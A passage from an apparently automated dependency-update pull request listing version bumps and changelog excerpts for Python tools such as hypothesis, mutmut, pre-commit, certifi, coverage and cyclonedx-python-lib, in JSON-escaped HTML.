(truncated)\u003c/p\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/HypothesisWorks/hypothesis/commit/fcc26c4c67eb9aaf4f153417f373f4c349128b54\"\u003e\u003ccode\u003efcc26c4\u003c/code\u003e\u003c/a\u003e Bump hypothesis version to 6.155.2 and update changelog\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/HypothesisWorks/hypothesis/commit/13cdd0b401f23468171e8d424da391892d5e5b26\"\u003e\u003ccode\u003e13cdd0b\u003c/code\u003e\u003c/a\u003e Merge pull request \u003ca href=\"https://redirect.github.com/HypothesisWorks/hypothesis/issues/4760\"\u003e#4760\u003c/a\u003e from Zac-HD/datetime-symbolic-4759\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/HypothesisWorks/hypothesis/commit/e48846d29ac846ca054697f4a2463f9550847e26\"\u003e\u003ccode\u003ee48846d\u003c/code\u003e\u003c/a\u003e format\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/HypothesisWorks/hypothesis/commit/b4152eaeae285ef4e24f0ebdc72b1e9ce817f769\"\u003e\u003ccode\u003eb4152ea\u003c/code\u003e\u003c/a\u003e rewrite comments and improve test\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/HypothesisWorks/hypothesis/commit/6b18db3fd215d15484f072b31bddafcef1a0b162\"\u003e\u003ccode\u003e6b18db3\u003c/code\u003e\u003c/a\u003e fixed flake\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/HypothesisWorks/hypothesis/commit/eb7d53abdc3a0c06efe919b4c75f6e4dc766d3f2\"\u003e\u003ccode\u003eeb7d53a\u003c/code\u003e\u003c/a\u003e Update pinned dependencies\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/HypothesisWorks/hypothesis/commit/1bbeb59dce2f9cfe5a4bde03bac16e8f09ae6da9\"\u003e\u003ccode\u003e1bbeb59\u003c/code\u003e\u003c/a\u003e Fix update_pyodide_versions for relocated xbuildenv metadata\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/HypothesisWorks/hypothesis/commit/552a461a915fe2deb610db19766c9d120272d492\"\u003e\u003ccode\u003e552a461\u003c/code\u003e\u003c/a\u003e Make date/time drawing symbolic-execution friendly\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/HypothesisWorks/hypothesis/commit/2c6dfdb16694041a49110590ef598b0324ff89f8\"\u003e\u003ccode\u003e2c6dfdb\u003c/code\u003e\u003c/a\u003e Merge pull request \u003ca href=\"https://redirect.github.com/HypothesisWorks/hypothesis/issues/4758\"\u003e#4758\u003c/a\u003e from bsluther/docs-fix-assume-condition\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/HypothesisWorks/hypothesis/commit/1416fe1a5d906a5dffa176bddee8899da9e4b129\"\u003e\u003ccode\u003e1416fe1\u003c/code\u003e\u003c/a\u003e Fix assume condition in \u003ccode\u003eadapting-strategies.rst\u003c/code\u003e\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/HypothesisWorks/hypothesis/compare/hypothesis-python-6.152.1...v6.155.2\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `beautifulsoup4` from 4.14.3 to 4.15.0\n\nUpdates `mutmut` from 3.5.0 to 3.6.0\n\u003cdetails\u003e\n\u003csummary\u003eChangelog\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/boxed/mutmut/blob/main/HISTORY.rst\"\u003emutmut's changelog\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003cp\u003e3.6.0\u003c/p\u003e\n\u003cpre\u003e\u003ccode\u003e\n* Add `# pragma: no mutate block` and `# pragma: no mutate start/end` comments\n\u003cul\u003e\n\u003cli\u003e\n\u003cp\u003eAdd \u003ccode\u003edo_not_mutate_patterns\u003c/code\u003e to disable mutations with a regex\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003eAdd \u003ccode\u003eonly_mutate\u003c/code\u003e config to select which files get mutated\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003eAlso mutate methods decorated with (only) \u003ccode\u003e@staticmethod\u003c/code\u003e or \u003ccode\u003e@classmethod\u003c/code\u003e\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003eAdd \u003ccode\u003euse_setproctitle\u003c/code\u003e option to disable process renaming (automatically disabled on MacOS)\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003eAdd (unstable) \u003ccode\u003etimeout_multiplier\u003c/code\u003e and \u003ccode\u003etimeout_constant\u003c/code\u003e options\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003eRename \u003ccode\u003epaths_to_mutate\u003c/code\u003e to \u003ccode\u003esource_paths\u003c/code\u003e\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003eDeprecate \u003ccode\u003etests_dir\u003c/code\u003e in favor of \u003ccode\u003epytest_add_cli_args_test_selection\u003c/code\u003e\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003eChange \u003ccode\u003emax_stack_depth\u003c/code\u003e to only consider functions inside \u003ccode\u003esource_paths\u003c/code\u003e\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003eDisable mutation of enums and \u003ccode\u003e@staticmethod\u003c/code\u003e/\u003ccode\u003e@classmethod\u003c/code\u003e methods when \u003ccode\u003etype_check_command\u003c/code\u003e is set, as these mutations break type checking\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003eFix mutation for enum class methods\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003eFix mutate_only_covered_lines when project uses custom coverage.py config\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003eFix execution when running mutmut via \u003ccode\u003epython -m mutmut run\u003c/code\u003e\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003eFix mutation of \u003ccode\u003eclass _SomePrivateClass\u003c/code\u003e class methods\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003eFix mutation of default args\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003eFix \u003ccode\u003emutmut browse\u003c/code\u003e crash when no file is selected yet\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003eFix timeout checker looking up the wrong mutant's expected test time, which could cause mutants to hang\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003eCompare stats paths after resolving symlinks\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003eWarn when mutmut cannot match mutants with the collected stats\u003cbr /\u003e\n\u003c/code\u003e\u003c/pre\u003e\u003c/p\u003e\n\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/blockquote\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003eSee full diff in \u003ca href=\"https://github.com/boxed/mutmut/commits\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `pre-commit` from 4.5.1 to 4.6.0\n\u003cdetails\u003e\n\u003csummary\u003eRelease notes\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/pre-commit/pre-commit/releases\"\u003epre-commit's releases\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003epre-commit v4.6.0\u003c/h2\u003e\n\u003ch3\u003eFeatures\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ccode\u003epre-commit hook-impl\u003c/code\u003e: allow \u003ccode\u003e--hook-dir\u003c/code\u003e to be missing to enable easier usage with \u003ccode\u003egit\u003c/code\u003e 2.54+ git hooks.\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://redirect.github.com/pre-commit/pre-commit/issues/3662\"\u003e#3662\u003c/a\u003e PR by \u003ca href=\"https://github.com/asottile\"\u003e\u003ccode\u003e@​asottile\u003c/code\u003e\u003c/a\u003e.\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch3\u003eFixes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ccode\u003epre-commit hook-impl\u003c/code\u003e: \u003ccode\u003e--hook-type\u003c/code\u003e is required.\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://redirect.github.com/pre-commit/pre-commit/issues/3661\"\u003e#3661\u003c/a\u003e PR by \u003ca href=\"https://github.com/asottile\"\u003e\u003ccode\u003e@​asottile\u003c/code\u003e\u003c/a\u003e.\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/blockquote\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eChangelog\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/pre-commit/pre-commit/blob/main/CHANGELOG.md\"\u003epre-commit's changelog\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch1\u003e4.6.0 - 2026-04-21\u003c/h1\u003e\n\u003ch3\u003eFeatures\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ccode\u003epre-commit hook-impl\u003c/code\u003e: allow \u003ccode\u003e--hook-dir\u003c/code\u003e to be missing to enable easier\nusage with \u003ccode\u003egit\u003c/code\u003e 2.54+ git hooks.\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://redirect.github.com/pre-commit/pre-commit/issues/3662\"\u003e#3662\u003c/a\u003e PR by \u003ca href=\"https://github.com/asottile\"\u003e\u003ccode\u003e@​asottile\u003c/code\u003e\u003c/a\u003e.\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch3\u003eFixes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ccode\u003epre-commit hook-impl\u003c/code\u003e: \u003ccode\u003e--hook-type\u003c/code\u003e is required.\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://redirect.github.com/pre-commit/pre-commit/issues/3661\"\u003e#3661\u003c/a\u003e PR by \u003ca href=\"https://github.com/asottile\"\u003e\u003ccode\u003e@​asottile\u003c/code\u003e\u003c/a\u003e.\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/blockquote\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pre-commit/pre-commit/commit/f35134b05028ec938ac605ae500fdf95462655d3\"\u003e\u003ccode\u003ef35134b\u003c/code\u003e\u003c/a\u003e v4.6.0\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pre-commit/pre-commit/commit/2a51ffcb81f6c8ed2e6467913c3343a8800f3ab9\"\u003e\u003ccode\u003e2a51ffc\u003c/code\u003e\u003c/a\u003e Merge pull request \u003ca href=\"https://redirect.github.com/pre-commit/pre-commit/issues/3662\"\u003e#3662\u003c/a\u003e from pre-commit/hook-impl-optional-hook-dir\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pre-commit/pre-commit/commit/d7dee322abfc765b042f2e3b872aab3c3a867610\"\u003e\u003ccode\u003ed7dee32\u003c/code\u003e\u003c/a\u003e make --hook-dir optional for hook-impl\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pre-commit/pre-commit/commit/965aeb1c680e8b526342153547f0ec014484c63d\"\u003e\u003ccode\u003e965aeb1\u003c/code\u003e\u003c/a\u003e Merge pull request \u003ca href=\"https://redirect.github.com/pre-commit/pre-commit/issues/3661\"\u003e#3661\u003c/a\u003e from pre-commit/hook-impl-required\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pre-commit/pre-commit/commit/2eacc064aa9b5bb33d3a0d84a234b475e34f3096\"\u003e\u003ccode\u003e2eacc06\u003c/code\u003e\u003c/a\u003e --hook-type is required for hook-impl\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pre-commit/pre-commit/commit/f5678bf4ac35cffc0ff7174ad85f7fdc2a5c977e\"\u003e\u003ccode\u003ef5678bf\u003c/code\u003e\u003c/a\u003e Merge pull request \u003ca href=\"https://redirect.github.com/pre-commit/pre-commit/issues/3657\"\u003e#3657\u003c/a\u003e from pre-commit/pre-commit-ci-update-config\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pre-commit/pre-commit/commit/054cc5bd6bb1b20faa1eefe09f0de3b68fceee94\"\u003e\u003ccode\u003e054cc5b\u003c/code\u003e\u003c/a\u003e [pre-commit.ci] pre-commit autoupdate\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pre-commit/pre-commit/commit/5c0f3024d2524f6e029a4c333392fd9be9fb27f6\"\u003e\u003ccode\u003e5c0f302\u003c/code\u003e\u003c/a\u003e Merge pull request \u003ca href=\"https://redirect.github.com/pre-commit/pre-commit/issues/3652\"\u003e#3652\u003c/a\u003e from pre-commit/pre-commit-ci-update-config\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pre-commit/pre-commit/commit/a5d91142676630f8130020b35e166e0c0e92b8f4\"\u003e\u003ccode\u003ea5d9114\u003c/code\u003e\u003c/a\u003e [pre-commit.ci] pre-commit autoupdate\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pre-commit/pre-commit/commit/129a1f5ca1eaee0c952a5e7a07faae305c5e15bc\"\u003e\u003ccode\u003e129a1f5\u003c/code\u003e\u003c/a\u003e Merge pull request \u003ca href=\"https://redirect.github.com/pre-commit/pre-commit/issues/3641\"\u003e#3641\u003c/a\u003e from pre-commit/mxr-patch-1\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/pre-commit/pre-commit/compare/v4.5.1...v4.6.0\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `certifi` from 2026.2.25 to 2026.5.20\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/certifi/python-certifi/commit/d7ea151afc2ce6bef0555b9349902bd867e928dd\"\u003e\u003ccode\u003ed7ea151\u003c/code\u003e\u003c/a\u003e 2026.05.20 (\u003ca href=\"https://redirect.github.com/certifi/python-certifi/issues/413\"\u003e#413\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/certifi/python-certifi/commit/5dddfb072243da27adde885b73ba9b809c3224ca\"\u003e\u003ccode\u003e5dddfb0\u003c/code\u003e\u003c/a\u003e 2026.04.22 (\u003ca href=\"https://redirect.github.com/certifi/python-certifi/issues/410\"\u003e#410\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/certifi/python-certifi/commit/f99eccdaf87f7c10e521a58a700ca3eb94a0787e\"\u003e\u003ccode\u003ef99eccd\u003c/code\u003e\u003c/a\u003e Bump peter-evans/create-pull-request from 8.1.0 to 8.1.1 (\u003ca href=\"https://redirect.github.com/certifi/python-certifi/issues/404\"\u003e#404\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/certifi/python-certifi/commit/918bed055f7291719512af186c1c24710f845660\"\u003e\u003ccode\u003e918bed0\u003c/code\u003e\u003c/a\u003e Bump actions/upload-artifact from 7.0.0 to 7.0.1 (\u003ca href=\"https://redirect.github.com/certifi/python-certifi/issues/405\"\u003e#405\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/certifi/python-certifi/commit/0a49067eb434e53e1f8df5f7707d5dc05ef9def4\"\u003e\u003ccode\u003e0a49067\u003c/code\u003e\u003c/a\u003e Bump pypa/gh-action-pypi-publish from 1.13.0 to 1.14.0 (\u003ca href=\"https://redirect.github.com/certifi/python-certifi/issues/403\"\u003e#403\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/certifi/python-certifi/commit/acf6ce8e39e3b125f4349e11904295e4fe4c1bed\"\u003e\u003ccode\u003eacf6ce8\u003c/code\u003e\u003c/a\u003e Bump actions/download-artifact from 8.0.0 to 8.0.1 (\u003ca href=\"https://redirect.github.com/certifi/python-certifi/issues/398\"\u003e#398\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/certifi/python-certifi/commit/feb0ed26163a9417ea0fb8eb52d47e79fcf202ab\"\u003e\u003ccode\u003efeb0ed2\u003c/code\u003e\u003c/a\u003e Bump actions/download-artifact from 7.0.0 to 8.0.0 (\u003ca href=\"https://redirect.github.com/certifi/python-certifi/issues/397\"\u003e#397\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/certifi/python-certifi/commit/d9c11a50369cc377abb40f7909ded3d6da4d98a3\"\u003e\u003ccode\u003ed9c11a5\u003c/code\u003e\u003c/a\u003e Bump actions/upload-artifact from 6.0.0 to 7.0.0 (\u003ca href=\"https://redirect.github.com/certifi/python-certifi/issues/396\"\u003e#396\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eSee full diff in \u003ca href=\"https://github.com/certifi/python-certifi/compare/2026.02.25...2026.05.20\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `coverage` from 7.13.5 to 7.14.1\n\u003cdetails\u003e\n\u003csummary\u003eChangelog\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/coveragepy/coveragepy/blob/main/CHANGES.rst\"\u003ecoverage's changelog\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003eVersion 7.14.1 — 2026-05-26\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003e\n\u003cp\u003eFix: the HTML report used typographic niceties to make file paths more\nreadable by adding a small amount of space around slashes. Those spaces\ninterfered with searching the page for file paths of interest. Now the report\nuses CSS to accomplish the same visual tweak so that searches with slashes\nwork correctly. Closes \u003ccode\u003eissue 2170\u003c/code\u003e_.\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003e\u003ccode\u003eAdd a 3.16 PyPI classifier \u0026lt;hugo-316_\u0026gt;\u003c/code\u003e_ since we test on the 3.16 main\nbranch.\u003c/p\u003e\n\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003e.. _issue 2170: \u003ca href=\"https://redirect.github.com/coveragepy/coveragepy/issues/2170\"\u003ecoveragepy/coveragepy#2170\u003c/a\u003e\n.. _hugo-316: \u003ca href=\"https://mastodon.social/@hugovk/116588523571204490\"\u003ehttps://mastodon.social/@​hugovk/116588523571204490\u003c/a\u003e\u003c/p\u003e\n\u003cp\u003e.. _changes_7-14-0:\u003c/p\u003e\n\u003ch2\u003eVersion 7.14.0 — 2026-05-10\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003e\n\u003cp\u003eFeature: now when running one of the reporting commands, if there are\nparallel data files that need combining, they will be implicitly combined\nbefore creating the report. There is no option to avoid the combination; let\nus know if you have a use case that requires it.  Thanks, \u003ccode\u003eTim Hatch \u0026lt;pull 2162_\u0026gt;\u003c/code\u003e\u003cem\u003e. Closes \u003ccode\u003eissue 1781\u003c/code\u003e\u003c/em\u003e.\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003eFix: the output from \u003ccode\u003ecombine\u003c/code\u003e was too verbose, listing each file\nconsidered. Now it shows a single line with the counts of files combined,\nfiles skipped, and files with errors. The \u003ccode\u003e-q\u003c/code\u003e flag suppresses this line.\nThe old detailed lines are available with the new \u003ccode\u003e--debug=combine\u003c/code\u003e option.\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003eFix: running a Python file through a symlink now sets the sys.path correctly,\nmatching regular Python behavior. Fixes \u003ccode\u003eissue 2157\u003c/code\u003e_.\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003eFix: \u003ccode\u003eCollector.flush_data\u003c/code\u003e could fail with \u0026quot;RuntimeError: Set changed\nsize during iteration\u0026quot; when a tracer in another thread added a line to the\nper-file set that \u003ccode\u003eadd_lines\u003c/code\u003e (or \u003ccode\u003eadd_arcs\u003c/code\u003e) was iterating. The values\npassed to \u003ccode\u003eCoverageData\u003c/code\u003e are now snapshotted via \u003ccode\u003edict.copy()\u003c/code\u003e and\n\u003ccode\u003eset.copy()\u003c/code\u003e, which are atomic under the GIL. Thanks, \u003ccode\u003eAlex Vandiver \u0026lt;pull 2165_\u0026gt;\u003c/code\u003e_.\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003eFix: the soft keyword \u003ccode\u003elazy\u003c/code\u003e is now bolded in HTML reports.\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003eWe are no longer testing eventlet support. Eventlet started issuing stern\ndeprecation warnings that break our tests. Our support code is still there.\u003c/p\u003e\n\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003e.. _issue 1781: \u003ca href=\"https://redirect.github.com/coveragepy/coveragepy/issues/1781\"\u003ecoveragepy/coveragepy#1781\u003c/a\u003e\n.. _issue 2157: \u003ca href=\"https://redirect.github.com/coveragepy/coveragepy/issues/2157\"\u003ecoveragepy/coveragepy#2157\u003c/a\u003e\n.. _pull 2162: \u003ca href=\"https://redirect.github.com/coveragepy/coveragepy/pull/2162\"\u003ecoveragepy/coveragepy#2162\u003c/a\u003e\u003c/p\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e... (truncated)\u003c/p\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/coveragepy/coveragepy/commit/64d9b66fd852c1920ffe6cb8b58d7e4fdae90226\"\u003e\u003ccode\u003e64d9b66\u003c/code\u003e\u003c/a\u003e docs: correct the date for 7.14.1\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/coveragepy/coveragepy/commit/6fa7dd44c25e1a660252faaf030dd8f2f1e20861\"\u003e\u003ccode\u003e6fa7dd4\u003c/code\u003e\u003c/a\u003e chore: bump actions/dependency-review-action (\u003ca href=\"https://redirect.github.com/coveragepy/coveragepy/issues/2181\"\u003e#2181\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/coveragepy/coveragepy/commit/078afae263597b004eb9a85d880b6a65008e75ed\"\u003e\u003ccode\u003e078afae\u003c/code\u003e\u003c/a\u003e docs: sample HTML for 7.14.1\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/coveragepy/coveragepy/commit/cb4f028a36e008b664739d04f387b90ee5105044\"\u003e\u003ccode\u003ecb4f028\u003c/code\u003e\u003c/a\u003e docs: prep for 7.14.1\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/coveragepy/coveragepy/commit/ae2d09f562271c6169534e1c242d015dd0823dda\"\u003e\u003ccode\u003eae2d09f\u003c/code\u003e\u003c/a\u003e Merge branch 'nedbat/classifire-316-kits'\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/coveragepy/coveragepy/commit/2c3568b2e041f2c0dbbc8eaa3919d46ee891b743\"\u003e\u003ccode\u003e2c3568b\u003c/code\u003e\u003c/a\u003e build: declare 3.16 compatibility\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/coveragepy/coveragepy/commit/faa68f8601cf098701b68976dbb73b9fc23c9297\"\u003e\u003ccode\u003efaa68f8\u003c/code\u003e\u003c/a\u003e chore: bump github/codeql-action in the action-dependencies group (\u003ca href=\"https://redirect.github.com/coveragepy/coveragepy/issues/2173\"\u003e#2173\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/coveragepy/coveragepy/commit/eb55feedf54b363e3d0b678f20abf3bfd3551a88\"\u003e\u003ccode\u003eeb55fee\u003c/code\u003e\u003c/a\u003e test: we don't need PyPy \u0026lt; 7.3.22 anymore\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/coveragepy/coveragepy/commit/ac168fe53c04cdb2ff5231c0c4e5045021ee339b\"\u003e\u003ccode\u003eac168fe\u003c/code\u003e\u003c/a\u003e test: the text summary should show missing\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/coveragepy/coveragepy/commit/fed4bd2db3c1cb2916a07791041da693fbf8e996\"\u003e\u003ccode\u003efed4bd2\u003c/code\u003e\u003c/a\u003e chore: upgrade virtualenv\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/coveragepy/coveragepy/compare/7.13.5...7.14.1\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `cyclonedx-python-lib` from 11.7.0 to 11.8.0\n\u003cdetails\u003e\n\u003csummary\u003eRelease notes\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/CycloneDX/cyclonedx-python-lib/releases\"\u003ecyclonedx-python-lib's releases\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003ev11.8.0 (2026-06-04)\u003c/h2\u003e\n\u003ch3\u003eDocumentation\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eUpdate CDX summary (\u003ca href=\"https://redirect.github.com/CycloneDX/cyclonedx-python-lib/pull/951\"\u003e#951\u003c/a\u003e, \u003ca href=\"https://github.com/CycloneDX/cyclonedx-python-lib/commit/752b1620a23e319add81c505fe7197a2ae3cca06\"\u003e\u003ccode\u003e752b162\u003c/code\u003e\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch3\u003eFeatures\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e\n\u003cp\u003eAdd support CycloneDX 1.7.1 \u0026amp; 1.6.2 \u0026amp; 1.5.1 (\u003ca href=\"https://redirect.github.com/CycloneDX/cyclonedx-python-lib/pull/985\"\u003e#985\u003c/a\u003e, \u003ca href=\"https://github.com/CycloneDX/cyclonedx-python-lib/commit/303889ba2b47033ae693c1af8bff552664e1910c\"\u003e\u003ccode\u003e303889b\u003c/code\u003e\u003c/a\u003e)\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003ePull SPDX license IDs v1.1-3.28.0 (\u003ca href=\"https://redirect.github.com/CycloneDX/cyclonedx-python-lib/pull/986\"\u003e#986\u003c/a\u003e, \u003ca href=\"https://github.com/CycloneDX/cyclonedx-python-lib/commit/42ff04444fa054d86da2302bc62e1bffd3b397df\"\u003e\u003ccode\u003e42ff044\u003c/code\u003e\u003c/a\u003e)\u003c/p\u003e\n\u003c/li\u003e\n\u003c/ul\u003e\n\u003chr /\u003e\n\u003ch2\u003eWhat's Changed\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003echore: extract glob for pyupgrade to separate script for cross-platform compatibility by \u003ca href=\"https://github.com/peschuster\"\u003e\u003ccode\u003e@​peschuster\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/CycloneDX/cyclonedx-python-lib/pull/950\"\u003eCycloneDX/cyclonedx-python-lib#950\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003edocs: update CDX summary by \u003ca href=\"https://github.com/jkowalleck\"\u003e\u003ccode\u003e@​jkowalleck\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/CycloneDX/cyclonedx-python-lib/pull/951\"\u003eCycloneDX/cyclonedx-python-lib#951\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003echore: fix test coverage reporting by \u003ca href=\"https://github.com/jkowalleck\"\u003e\u003ccode\u003e@​jkowalleck\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/CycloneDX/cyclonedx-python-lib/pull/956\"\u003eCycloneDX/cyclonedx-python-lib#956\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003echore(deps-dev): update tomli requirement from 2.3.0 to 2.4.1 by \u003ca href=\"https://github.com/dependabot\"\u003e\u003ccode\u003e@​dependabot\u003c/code\u003e\u003c/a\u003e[bot] in \u003ca href=\"https://redirect.github.com/CycloneDX/cyclonedx-python-lib/pull/954\"\u003eCycloneDX/cyclonedx-python-lib#954\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003echore(release): use own GH app for releasing by \u003ca href=\"https://github.com/jkowalleck\"\u003e\u003ccode\u003e@​jkowalleck\u003c/code\u003e\u003c/a\u003e in \u003ca 